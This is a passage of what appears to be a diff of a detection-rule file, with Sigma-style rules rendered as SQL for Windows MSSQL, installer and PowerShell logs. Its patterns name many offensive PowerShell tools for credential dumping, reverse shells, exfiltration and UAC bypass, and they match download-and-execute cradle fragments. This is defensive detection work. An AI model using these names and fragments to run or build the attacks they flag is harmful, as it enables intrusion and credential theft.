LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR 
Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": 
"711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike 
Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' 
AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE 
